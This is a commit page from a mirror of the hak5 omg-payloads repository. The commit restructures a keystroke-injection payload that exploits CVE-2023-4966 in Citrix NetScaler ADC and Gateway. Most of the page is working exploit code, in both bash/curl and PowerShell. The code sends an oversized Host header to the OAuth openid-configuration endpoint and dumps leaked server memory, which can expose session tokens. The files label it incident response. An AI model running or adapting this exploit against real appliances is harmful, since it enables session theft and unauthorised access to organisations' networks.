hak5
/
omg-payloads
mirror of https://github.com/hak5/omg-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Removing the CapsLock Error

pull/212/head
aleff-github 2023-12-11 16:42:28 +01:00
parent 973cb19020
commit 0933d313fb
4 changed files with 76 additions and 111 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/README.md
View File

@ -55,11 +55,6 @@ The sole configuration parameter that requires modification is the hostname, whi
DEFINE #HOSTNAME 192.168.1.200 DEFINE #HOSTNAME 192.168.1.200
``` ```
## DuckyScript Extensions Used
- **DETECT_READY**: Extension used to check whether the machine is ready to execute the payload without making unnecessary waits. [[2](#sources)]
- **PASSIVE_WINDOWS_DETECT**: Extension used to check which operating system you are operating on so that you have a valid tool for both Windows and different systems, for instance GNU/Linux systems. [[3](#sources)]
## Payload Description Windows ## Payload Description Windows
In this line, a variable named `$header_value` is created, containing a string of 24576 'a' characters. This variable represents the value to be used in the HTTP header. In this line, a variable named `$header_value` is created, containing a string of 24576 'a' characters. This variable represents the value to be used in the HTTP header.
@ -172,9 +167,6 @@ After assigning execute permissions, the above command allows the user to run th
## Sources ## Sources
- [1] Official source of information acquisition: https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967 - [1] Official source of information acquisition: https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967
- [2] Detect Rady: https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready
- [3] Passive Windows Detect: https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt
- [4] Red Hot Cyber post: https://www.redhotcyber.com/post/e-pubblico-lexploit-per-il-bug-critico-di-citrix-netscaler-adc-e-gateway-scopriamo-come-funziona/
## Credits ## Credits

33
payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/gnu-linux_payload.txt Normal file
View File

@ -0,0 +1,33 @@
REM ################################################################################
REM # #
REM # Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 #
REM # Author : Aleff #
REM # Version : 1.0 #
REM # Category : incident-response #
REM # Target : Citrix NetScaler ADV; NetScaler Gateway #
REM # #
REM ################################################################################
REM Define here your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)
DEFINE #HOSTNAME example
DEALY 2000
CTRL-ALT t
DELAY 1000
STRINGLN_BLOCK
header_value=$(yes a | head -n 24576 | tr -d '\n')
headers="-H 'Host:$header_value'"
response=$(curl -s -k -H "$headers" "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)
if [ $? -eq 0 ] && [ "$(echo $response | cut -c 1-3)" == "200" ]; then
echo "--- Dumped memory ---"
echo "$response" | cut -c 131051-
echo "The #HOSTNAME is vulnerable!"
echo "--- End ---"
else
echo "Could not dump memory"
fi
END_STRINGLN

102
payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/payload.txt
View File

@ -1,102 +0,0 @@
REM ################################################################################
REM # #
REM # Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 #
REM # Author : Aleff #
REM # Version : 1.0 #
REM # Category : incident-response #
REM # Target : Citrix NetScaler ADV; NetScaler Gateway #
REM # #
REM ################################################################################
REM Define here your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)
DEFINE #HOSTNAME example
REM Detect what in what OS is running the payload
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
END_EXTENSION
REM Payload content
IF ($_OS == WINDOWS) THEN
REM Open a powershell
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 1000
STRINGLN_BLOCK
$header_value = 'a' * 24576
$header_value = $header_value -replace "\n", ""
$headers="-H 'Host:$header_value'"
$headers = @{
'Host' = $header_value
}
$uri = "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration"
$response = Invoke-RestMethod -Uri $uri -Headers $headers -Method GET -TimeoutSec 10
if ($response.Substring(0, 3) -eq "200") {
Write-Host "--- Dumped memory ---"
$response.Substring(131050) # 131051 - 1
Write-Host "The #HOSTNAME is vulnerable!"
Write-Host "--- End ---"
} else {
Write-Host "Could not dump memory"
}
END_STRINGLN
ELSE
CTRL-ALT t
DELAY 1000
STRINGLN_BLOCK
header_value=$(yes a | head -n 24576 | tr -d '\n')
headers="-H 'Host:$header_value'"
response=$(curl -s -k -H "$headers" "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)
if [ $? -eq 0 ] && [ "$(echo $response | cut -c 1-3)" == "200" ]; then
echo "--- Dumped memory ---"
echo "$response" | cut -c 131051-
echo "The #HOSTNAME is vulnerable!"
echo "--- End ---"
else
echo "Could not dump memory"
fi
END_STRINGLN
END_IF

42
payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/windows-payload.txt Normal file
View File

@ -0,0 +1,42 @@
REM ################################################################################
REM # #
REM # Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 #
REM # Author : Aleff #
REM # Version : 1.0 #
REM # Category : incident-response #
REM # Target : Citrix NetScaler ADV; NetScaler Gateway #
REM # #
REM ################################################################################
REM Define here your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)
DEFINE #HOSTNAME example
REM Open a powershell
DELAY 2000
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 1000
STRINGLN_BLOCK
$header_value = 'a' * 24576
$header_value = $header_value -replace "\n", ""
$headers="-H 'Host:$header_value'"
$headers = @{
'Host' = $header_value
}
$uri = "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration"
$response = Invoke-RestMethod -Uri $uri -Headers $headers -Method GET -TimeoutSec 10
if ($response.Substring(0, 3) -eq "200") {
Write-Host "--- Dumped memory ---"
$response.Substring(131050) # 131051 - 1
Write-Host "The #HOSTNAME is vulnerable!"
Write-Host "--- End ---"
} else {
Write-Host "Could not dump memory"
}
END_STRINGLN